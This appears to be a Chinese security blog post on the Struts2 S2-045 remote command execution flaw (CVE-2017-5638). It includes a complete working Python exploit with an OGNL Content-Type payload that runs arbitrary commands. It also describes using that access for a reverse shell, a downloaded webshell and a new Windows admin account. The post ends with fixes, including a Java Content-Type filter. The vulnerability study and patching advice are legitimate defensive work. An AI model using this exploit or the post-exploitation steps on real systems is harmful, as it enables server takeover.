<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Struts2,命令执行漏洞,">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2">






<meta name="description" content="S2-045 Struts2远程命令执行漏洞0x01 stuctsStruts是Apache基金会的一个开源项目，Struts通过采用Java Servlet/JSP技术，实现了基于Java EE Web应用的Model-View-Controller(MVC)设计模式的应用框架，是MVC经典设计模式中的一个经典产品。">
<meta name="keywords" content="Struts2,命令执行漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="Struts2远程命令执行漏洞">
<meta property="og:url" content="http://blbana.cc/2017/03/08/Struts2远程命令执行漏洞/index.html">
<meta property="og:site_name" content="BlBana&#39;s Blog 一只Web汪 ~">
<meta property="og:description" content="S2-045 Struts2远程命令执行漏洞0x01 stuctsStruts是Apache基金会的一个开源项目，Struts通过采用Java Servlet/JSP技术，实现了基于Java EE Web应用的Model-View-Controller(MVC)设计模式的应用框架，是MVC经典设计模式中的一个经典产品。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/1.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/2.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/3.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/4.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/5.png">
<meta property="og:updated_time" content="2018-11-13T15:13:52.499Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Struts2远程命令执行漏洞">
<meta name="twitter:description" content="S2-045 Struts2远程命令执行漏洞0x01 stuctsStruts是Apache基金会的一个开源项目，Struts通过采用Java Servlet/JSP技术，实现了基于Java EE Web应用的Model-View-Controller(MVC)设计模式的应用框架，是MVC经典设计模式中的一个经典产品。">
<meta name="twitter:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://blbana.cc/2017/03/08/Struts2远程命令执行漏洞/">





  <title>Struts2远程命令执行漏洞 | BlBana's Blog 一只Web汪 ~</title>
  














</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">BlBana's Blog 一只Web汪 ~</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">A interesting Web Dog~</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://blbana.cc/2017/03/08/Struts2远程命令执行漏洞/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="BlBana">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="BlBana's Blog 一只Web汪 ~">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Struts2远程命令执行漏洞</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-03-08T19:00:13+08:00">
                2017-03-08
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/命令执行/" itemprop="url" rel="index">
                    <span itemprop="name">命令执行</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="S2-045-Struts2远程命令执行漏洞"><a href="#S2-045-Struts2远程命令执行漏洞" class="headerlink" title="S2-045 Struts2远程命令执行漏洞"></a>S2-045 Struts2远程命令执行漏洞</h2><h3 id="0x01-stucts"><a href="#0x01-stucts" class="headerlink" title="0x01 stucts"></a>0x01 stucts</h3><p>Struts是Apache基金会的一个开源项目，Struts通过采用Java Servlet/JSP技术，实现了基于Java EE Web应用的Model-View-Controller(MVC)设计模式的应用框架，是MVC经典设计模式中的一个经典产品。<br><a id="more"></a></p>
<h3 id="0x02-影响范围"><a href="#0x02-影响范围" class="headerlink" title="0x02 影响范围"></a>0x02 影响范围</h3><p>Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10</p>
<h3 id="0x03-不受影响版本"><a href="#0x03-不受影响版本" class="headerlink" title="0x03 不受影响版本"></a>0x03 不受影响版本</h3><p>Struts 2.3.32 Struts 2.5.10.1</p>
<h3 id="0x04-漏洞危害"><a href="#0x04-漏洞危害" class="headerlink" title="0x04 漏洞危害"></a>0x04 漏洞危害</h3><p>在default.properties文件中，struts.multipart.parser的值有两个选择，分别是jakarta和pell。在Strucs 2框架中jakarta解析器是框架的标准组成部分。默认这个解析器是启动的。<br>由于该组件解析上传文件的Content-Type头时，异常处理函数没有正确的处理用户输入的错误信息。导致可以远程发送恶意的上传数据包，利用漏洞可以执行任意的命令。</p>
<blockquote>
<p>漏洞编号：CVE-2017-5638<br>漏洞名称：S2-045：Struts 2远程执行代码漏洞<br>漏洞影响：基于JakartaMultipart解析器执行文件上传时可能的RCE</p>
</blockquote>
<h3 id="0x05-PoC漏洞检测"><a href="#0x05-PoC漏洞检测" class="headerlink" title="0x05 PoC漏洞检测"></a>0x05 PoC漏洞检测</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! /usr/bin/env python</span></span><br><span class="line"><span class="comment"># encoding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> urllib2</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> poster.encode <span class="keyword">import</span> multipart_encode</span><br><span class="line"><span class="keyword">from</span> poster.streaminghttp <span class="keyword">import</span> register_openers</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">poc</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">if</span> len(sys.argv) &lt; <span class="number">3</span>:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'''Usage: poc.py http://172.16.12.2/example/HelloWorld.action "command"'''</span></span><br><span class="line">        sys.exit()</span><br><span class="line">    register_openers()</span><br><span class="line">    datagen, header = multipart_encode(&#123;<span class="string">"image"</span>: open(<span class="string">"tmp.txt"</span>, <span class="string">"w+"</span>)&#125;)</span><br><span class="line">    header[<span class="string">"User-Agent"</span>]=<span class="string">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"</span></span><br><span class="line">    header[<span class="string">"Content-Type"</span>]=<span class="string">"%&#123;(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"</span>+str(sys.argv[<span class="number">2</span>])+<span class="string">"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?&#123;'cmd.exe','/c',#cmd&#125;:&#123;'/bin/bash','-c',#cmd&#125;)).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())&#125;"</span></span><br><span class="line">    request = urllib2.Request(str(sys.argv[<span class="number">1</span>]),datagen,headers=header)</span><br><span class="line">    response = urllib2.urlopen(request)</span><br><span class="line">    <span class="keyword">print</span> response.read()</span><br><span class="line">poc()</span><br></pre></td></tr></table></figure>
<p><strong>通过此PoC确认目标是否存在此漏洞</strong>，此外还可以通过Seebug上的照妖镜来进行在线的检测，可以判断目标机器是否存在漏洞。</p>
<h3 id="0x06-漏洞复现"><a href="#0x06-漏洞复现" class="headerlink" title="0x06 漏洞复现"></a>0x06 漏洞复现</h3><p>我在本机的ubuntu上复现了此漏洞，配置环境如下：</p>
<ol>
<li>Tomcat5</li>
<li><p>struts 2.3.31</p>
</li>
<li><p>部署的方式比较容易，先安装好Tomcat的服务器，访问<a href="http://localhost:8080进行检测环境是否搭建成功。（需在服务器上配置好Java环境，参考连接：[Tomcat环境部署](http://drops.blbana.cc/2016/10/24/e9-80-9a-e8-bf-87tomcat-e8-8e-b7-e5-8f-96webshell/%22Tomcat%E7%8E%AF%E5%A2%83%E9%83%A8%E7%BD%B2%22)）" target="_blank" rel="noopener">http://localhost:8080进行检测环境是否搭建成功。（需在服务器上配置好Java环境，参考连接：[Tomcat环境部署](http://drops.blbana.cc/2016/10/24/e9-80-9a-e8-bf-87tomcat-e8-8e-b7-e5-8f-96webshell/%22Tomcat%E7%8E%AF%E5%A2%83%E9%83%A8%E7%BD%B2%22)）</a><br><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/1.png" alt="enter image description here"></p>
</li>
<li><p>Tomcat的环境搭建完成了以后，可以进入struts2的官网下载存在漏洞的应用程序版本，利用刚才部署环境里的方法将struts2的war包导入到Tomcat的环境当中，访问搭建好的环境如下所示：<br><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/2.png" alt="enter image description here"></p>
</li>
<li><p>环境搭建完成以后，可以利用上面的PoC对其进行一个测试的操作</p>
<blockquote>
<p>注意：这个脚本需要安装poster的python类库才能正常运行<br>我是在windows环境下进行测试的，直接运行python的脚本，填写好目标的地址，可以拿到一个执行命令的权限<br><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/3.png" alt="enter image description here"></p>
</blockquote>
</li>
<li><p>接下来我们可以在公网的服务器上监听一个端口，然后利用命令执行反弹一个shell给服务器，直接获取服务器的权限<br><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/4.png" alt="enter image description here"></p>
</li>
</ol>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/struts2/5.png" alt="enter image description here"></p>
<ol start="5">
<li><p>除此之外，当我们拿到了较高的权限的时候，还可以在我们的服务器上放一个webshell，然后通过执行命令将服务器上的webshell下载到目标机器上，这里注意的是需要<strong>知道网站的真实路径</strong>（<em>通过locate </em>.jsp来定位jsp文件的位置*），之后当获得了webshell的时候就可以得到文件管理，上传等权限了。</p>
</li>
<li><p>对于windows服务器可以直接执行创建用户和添加管理员的两条命令，如果3389端口打开，可以直接利用创建的用户打开远程桌面。</p>
</li>
</ol>
<h3 id="0x07漏洞修复"><a href="#0x07漏洞修复" class="headerlink" title="0x07漏洞修复"></a>0x07漏洞修复</h3><ol>
<li>升级版本：正在使用Jakarta文件上传插件的可以升级版本到struts2的安全版本</li>
<li>过滤验证：通过判断Content-Type是否为白名单，限制非法的攻击<br>加固代码：</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.servlet.Filter;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.FilterChain;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.FilterConfig;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletException;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletResponse;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletResponse;</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">SecurityFilter</span> <span class="keyword">extends</span> <span class="title">HttpServlet</span> <span class="keyword">implements</span> <span class="title">Filter</span> </span>&#123;</span><br><span class="line"> </span><br><span class="line">        <span class="comment">/**</span></span><br><span class="line"><span class="comment">         * </span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">long</span> serialVersionUID = <span class="number">1L</span>;</span><br><span class="line">         </span><br><span class="line">         </span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">final</span> String www_url_encode= <span class="string">"application/x-www-form-urlencoded"</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">final</span> String mul_data= <span class="string">"multipart/form-data "</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">final</span> String txt_pla= <span class="string">"text/plain"</span>;</span><br><span class="line"> </span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">doFilter</span><span class="params">(ServletRequest arg0, ServletResponse arg1,</span></span></span><br><span class="line"><span class="function"><span class="params">                        FilterChain arg2)</span> <span class="keyword">throws</span> IOException, ServletException </span>&#123;</span><br><span class="line"> </span><br><span class="line">                HttpServletRequest request = (HttpServletRequest) arg0;</span><br><span class="line">                HttpServletResponse response = (HttpServletResponse) arg1;</span><br><span class="line">                 </span><br><span class="line">                String contenType=request.getHeader(<span class="string">"conTent-type"</span>);</span><br><span class="line">                 </span><br><span class="line">                <span class="keyword">if</span>(contenType!=<span class="keyword">null</span>&amp;&amp;!contenType.equals(<span class="string">""</span>)&amp;&amp;!contenType.equalsIgnoreCase(www_url_encode)&amp;&amp;!contenType.equalsIgnoreCase(mul_data)&amp;&amp;!contenType.equalsIgnoreCase(txt_pla))&#123;</span><br><span class="line">                         </span><br><span class="line">                        response.setContentType(<span class="string">"text/html;charset=UTF-8"</span>);</span><br><span class="line">                        response.getWriter().write(<span class="string">"非法请求Content-Type！"</span>);</span><br><span class="line">                        <span class="keyword">return</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                arg2.doFilter(request, response);</span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">init</span><span class="params">(FilterConfig arg0)</span> <span class="keyword">throws</span> ServletException </span>&#123;</span><br><span class="line"> </span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>编译成“SecurityFilter.class”复制到应用的WEB-INF/classes目录下，配置web.xml文件，使该文件生效</p>
<ol start="3">
<li>还有一种方法就是进入将默认的Jakarta模块改为使用Pell模块</li>
</ol>
<hr>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Struts2/" rel="tag"># Struts2</a>
          
            <a href="/tags/命令执行漏洞/" rel="tag"># 命令执行漏洞</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/12/19/PHP-s-mail-远程代码执行/" rel="next" title="PHP's mail()远程代码执行">
                <i class="fa fa-chevron-left"></i> PHP's mail()远程代码执行
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/05/20/SQLi-——-逗号，空格，字段名过滤突破/" rel="prev" title="SQLi —— 逗号，空格，字段名过滤突破">
                SQLi —— 逗号，空格，字段名过滤突破 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="BlBana">
          <p class="site-author-name" itemprop="name">BlBana</p>
           
              <p class="site-description motion-element" itemprop="description">Web安全 | 代码审计 | PHP | Python ...</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">28</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              
                <span class="site-state-item-count">22</span>
                <span class="site-state-item-name">分类</span>
              
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              
                <span class="site-state-item-count">36</span>
                <span class="site-state-item-name">标签</span>
              
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#S2-045-Struts2远程命令执行漏洞"><span class="nav-number">1.</span> <span class="nav-text">S2-045 Struts2远程命令执行漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-stucts"><span class="nav-number">1.1.</span> <span class="nav-text">0x01 stucts</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-影响范围"><span class="nav-number">1.2.</span> <span class="nav-text">0x02 影响范围</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-不受影响版本"><span class="nav-number">1.3.</span> <span class="nav-text">0x03 不受影响版本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-漏洞危害"><span class="nav-number">1.4.</span> <span class="nav-text">0x04 漏洞危害</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-PoC漏洞检测"><span class="nav-number">1.5.</span> <span class="nav-text">0x05 PoC漏洞检测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x06-漏洞复现"><span class="nav-number">1.6.</span> <span class="nav-text">0x06 漏洞复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x07漏洞修复"><span class="nav-number">1.7.</span> <span class="nav-text">0x07漏洞修复</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">BlBana</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  





  

  

  

  

  

  

</body>
</html>
